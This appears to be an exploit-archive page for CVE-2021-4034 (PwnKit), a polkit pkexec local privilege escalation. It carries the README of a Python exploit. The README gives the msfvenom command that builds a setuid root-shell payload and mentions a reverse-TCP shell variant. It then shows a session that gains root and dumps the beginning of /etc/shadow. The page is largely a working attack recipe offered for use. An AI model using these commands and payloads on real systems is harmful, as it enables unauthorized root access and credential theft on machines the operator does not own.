Associated vulnerability
Title:
polkit buffer error vulnerability
(CVE-2021-4034)
Description: polkit is a component that controls system-wide privileges in Unix-like operating systems. By defining and auditing permission rules, it mediates communication between processes of different privilege levels. polkit's pkexec application contains a buffer error vulnerability; an attacker can exploit it by crafting environment variables that induce pkexec to execute arbitrary code. If the attack succeeds and an unprivileged user on the target machine thereby obtains administrative privileges, the result is a local privilege escalation.
Description
Python exploit code for CVE-2021-4034 (pwnkit)
Introduction
Python3 code to exploit
[CVE-2021-4034](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
[(PWNKIT)](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt).
This was an exercise in "can I make this work in Python?", and not meant
as a robust exploit. It Works For Me, there are probably bugs.
The default payload starts a shell as `root`, generated from `msfvenom`:
```shell
msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
```
I've tested `linux/x64/shell_reverse_tcp` as well. Make sure you include
the `PrependSetuid=true` argument to `msfvenom`, otherwise you'll just get
a shell as the user and not root.
The code is cribbed from [blasty](https://twitter.com/bl4sty); the original is
available [here](https://haxx.in/files/blasty-vs-pkexec.c).
```shell-session
$ python CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1000(jra) groups=1000(jra),4(adm),27(sudo),119(lpadmin),998(lxd)
# whoami
root
# head /etc/shadow
root:*:18709:0:99999:7:::
daemon:*:18709:0:99999:7:::
bin:*:18709:0:99999:7:::
sys:*:18709:0:99999:7:::
sync:*:18709:0:99999:7:::
games:*:18709:0:99999:7:::
man:*:18709:0:99999:7:::
lp:*:18709:0:99999:7:::
mail:*:18709:0:99999:7:::
news:*:18709:0:99999:7:::
#
```
File snapshot
[4.0K] /data/pocs/5a38758666d3d03b56dce37b261e6822ec895e3a
├── [3.2K] CVE-2021-4034.py
├── [6.9K] LICENSE
└── [1.3K] README.md
0 directories, 3 files
Notes
1. It is recommended to access the PoC via its original source first.
2. If the source is gone or unreachable, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of this POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.